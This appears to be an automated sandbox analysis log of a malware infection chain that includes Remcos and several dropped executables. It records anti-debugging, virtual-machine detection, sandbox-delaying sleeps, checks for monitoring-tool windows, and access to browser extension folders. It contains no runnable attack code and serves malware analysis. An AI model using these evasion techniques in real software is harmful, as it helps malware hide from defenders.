Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Special instruction interceptor: First address: 6DD886 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Special instruction interceptor: First address: 87B9BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Special instruction interceptor: First address: 90E8D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Special instruction interceptor: First address: F6DFDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Special instruction interceptor: First address: 1112CDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Special instruction interceptor: First address: 111BB46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Special instruction interceptor: First address: 119FA8A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 5F8D932 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 5F8D886 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 612B9BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 61BE8D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 61DD932 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 61DD886 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 637B9BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: 640E8D7 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Memory allocated: 1DBA6CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Memory allocated: 1DBC0800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 4FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 53C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 51D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 4870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 4BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Memory allocated: 49E0000 memory reserve \| memory write watch

Source: C:\ProgramData\Remcos\remcos.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\Remcos\remcos.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\Remcos\remcos.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

Code function: 9_2_049B0C8A rdtsc

9_2_049B0C8A

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599325
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Window / User API: threadDelayed 1323
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Window / User API: threadDelayed 2068

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 4312	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7856	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7856	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7532	Thread sleep count: 340 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7532	Thread sleep time: -10200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7868	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7868	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6792	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7532	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe TID: 6644	Thread sleep time: -36018s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 8088	Thread sleep time: -40020s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 3492	Thread sleep time: -40020s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 8064	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 8060	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 7920	Thread sleep time: -40020s >= -30000s
Source: C:\ProgramData\Remcos\remcos.exe TID: 7728	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599325s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -599106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe TID: 3568	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe TID: 7828	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe TID: 6100	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe TID: 3652	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe TID: 6972	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe TID: 1012	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe TID: 4820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe TID: 7560	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\ProgramData\Remcos\remcos.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C765070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,

0_2_6C765070

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C64EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C64EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599325
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 0000000B.00000002.2924293493.0000000000D0E000.00000040.00000001.01000000.0000000F.sdmp, remcos_a.exe, 0000000C.00000002.2460451100.0000000000607000.00000040.00000001.01000000.00000010.sdmp, remcos.exe, 0000000D.00000002.2923240993.0000000000607000.00000040.00000001.01000000.00000011.sdmp, ed55d3f620.exe, 0000001A.00000002.2855925384.0000000006110000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2849065311.0000000000D3C000.00000040.00000001.01000000.00000015.sdmp, remcos.exe, 0000001B.00000002.2624780998.0000000000607000.00000040.00000001.01000000.00000011.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629645077.0000000000860000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908441599.0000000006360000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2900374765.0000000000D3C000.00000040.00000001.01000000.00000015.sdmp, 315ef68721.exe, 0000001F.00000002.2822042223.00000000010F5000.00000040.00000001.01000000.00000017.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: buildd.exe, 0000000E.00000002.2514773003.000001DBC10DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_0
Source: ed55d3f620.exe, 0000001A.00000002.2848105530.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: file.exe, 00000000.00000002.1989629326.0000000001571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669441404.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw]6B
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.2929148209.000000000158A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.2929148209.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.0000000000791000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2848105530.0000000000791000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2630997068.0000000001257000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: buildd.exe, 0000000E.00000002.2513625788.000001DBC1000000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareome
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.0000000001226000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: buildd.exe, 0000000E.00000000.2446715190.000001DBA6962000.00000002.00000001.01000000.00000012.sdmp, buildd[1].exe.11.dr	Binary or memory string: qemu'<
Source: file.exe, 00000000.00000002.1989629326.000000000152E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarehi
Source: file.exe, 00000000.00000002.1988707190.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp, DocumentsFHIEBKKFHI.exe, 00000009.00000002.2047742282.0000000000A9E000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 0000000A.00000002.2090251495.0000000000D0E000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000B.00000002.2924293493.0000000000D0E000.00000040.00000001.01000000.0000000F.sdmp, remcos_a.exe, 0000000C.00000002.2460451100.0000000000607000.00000040.00000001.01000000.00000010.sdmp, remcos.exe, 0000000D.00000002.2923240993.0000000000607000.00000040.00000001.01000000.00000011.sdmp, ed55d3f620.exe, 0000001A.00000002.2855925384.0000000006110000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2849065311.0000000000D3C000.00000040.00000001.01000000.00000015.sdmp, remcos.exe, 0000001B.00000002.2624780998.0000000000607000.00000040.00000001.01000000.00000011.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629645077.0000000000860000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908441599.0000000006360000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ed55d3f620.exe, 0000001A.00000002.2854646925.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareo
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC
Source: remcos.exe, 0000000D.00000002.2926361931.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2513625788.000001DBC1061000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\Remcos\remcos.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\Remcos\remcos.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: gbdyllo
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: ollydbg
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\Remcos\remcos.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\ProgramData\Remcos\remcos.exe	File opened: NTICE
Source: C:\ProgramData\Remcos\remcos.exe	File opened: SICE
Source: C:\ProgramData\Remcos\remcos.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
